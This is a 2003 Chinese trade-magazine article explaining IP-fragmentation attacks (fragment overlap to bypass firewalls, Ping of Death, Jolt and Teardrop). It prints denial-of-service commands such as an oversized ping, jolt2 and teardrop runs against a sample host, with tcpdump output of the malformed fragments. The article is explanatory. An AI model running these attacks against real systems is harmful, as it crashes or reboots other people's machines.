出版日期：2003-12-1　总期号：1271　本年期号：90

本期导读 要闻综合 中国信息化 网络与通信 软件与服务 产品与应用 渠道与市场 华东专刊 华南专刊 西北专刊 东北专刊 西南专刊

基于IP分片的攻击方法 　　 Fragment Overlap 攻击。比起Tiny fragment攻击，fragment Overlap是更为精巧的攻击。攻击者为了发动攻击将攻击IP包分为两个分片。第一个分片中包含包过滤设备允许的 http(TCP 80) 等端口。在第二个分片中通过极小的偏移量造成第二个分片覆盖第一个分片的一部分内容。通常攻击者覆盖包含端口内容的部分。 　　 由于在第一个分片中包含防火墙中允许的端口，因此第一个分片将会被通过。而第二个分片中具有允许通过的第一个分片ID，因此也被允许通过。但是当这两个分片到达目标主机进行重组之后，由于第一个分片的端口号被第二个分片的端口号覆盖，因此将会访问第二个分片中指定的端口。也就是绕过防火墙访问了未被授权的端口。 　　 基于IP分片的拒绝服务攻击 　　 IP分片不仅用于绕过防火墙或者IDS，而且也用于发动拒绝服务攻击。常见的Ping of Death 或者Teardrop属于这种攻击。 　　 Ping of Death、Jolt 的攻击。这些攻击是通过发送超过RFC规范所规定IP报文而使操作系统无法正常工作的拒绝服务攻击。根据RFC-791 “Internet Protocol”规定，包含报头的IP 报文的最大长度为65,535， 在很多系统在处理IP报文时将其最大值假定为该值。通常可通过ping程序发起简单的攻击。一般情况下IP报头为20字节，而ICMP报头为 8字节，因此实际数据的最大长度为65535-20-8=65507字节。因此不限制ping报文最大长度的系统中，可通过如下命令发起攻击。 　　 ping -l 65510 victim.host.ip.address 　　 Windows NT系统中曾经允许类似命令，但是最近的系统不允许发送这种异常的数据报文。但是可通过jolt工具发送异常大的报文发起攻击。 　　 [root@insecure DoS]# ./jolt2 　　 Usage: ./jolt2 [-s src_addr] [-p port] dest_addr 　　 Note: UDP used if a port is specified, otherwise ICMP 　　 [root@insecure DoS]# ./jolt2 -p 139 192.168.0.30 　　 可通过tcpdump监控到如下内容。 　　 20:04:51.188599 test.com.cn > 192.168.0.30: (frag 1109:9@65520) 　　 20:04:51.188850 test.com.cn > 192.168.0.30: (frag 1109:9@65520) 　　 20:04:51.189103 test.com.cn > 192.168.0.30: (frag 1109:9@65520) 　　 20:04:51.189358 test.com.cn > 192.168.0.30: (frag 1109:9@65520) 　　 20:04:51.189608 test.com.cn > 192.168.0.30: (frag 1109:9@65520) 　　 20:04:51.189864 test.com.cn > 192.168.0.30: (frag 1109:9@65520) 　　 目标系统（Windows NT）192.168.0.30遭受攻击将会瘫痪。 　　 Teardrop, bonk, New Teardrop 攻击。Teardrop 也是利用分片重组漏洞的拒绝服务攻击。通过操作第二个分片的偏移量，使分片在重组的过程中缓存溢出，从而使目标系统宕掉或者重新启动。下面通过实例说明Teardrop攻击。 　　 [root@unsecure DoS]# ./teardrop.linux --help 　　 ./teardrop.linux src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ] 　　 [root@unsecure DoS]# ./teardrop.linux 1.1.1.1 192.168.0.30 -t 139 　　 [ Binary courtesy: http://www.rootshell.com/ ] 　　 teardrop route|daemon9 　　 Death on flaxen wings: 　　 From: 1.1.1.1.46838 　　 To: 192.168.0.30. 139 　　 Amt: 1 　　 [ b00m ] 　　 通过tcpdump可监听到如下内容。 　　 23:29:18.503558 1.1.1.1.51331 > 192.168.0.30.139: udp 28 (frag 242:36@0+) 　　 23:29:18.504693 1.1.1.1 > 192.168.0.30: (frag 242:4@24) 　　 可以看出第一个分片大小为36，而第二个分片的偏移量为24。因此第一个分片与第二个分片重叠。从而可导致系统宕机或者重新启动。 与Teardrop类似的攻击有Bonk、New Teardrop等攻击。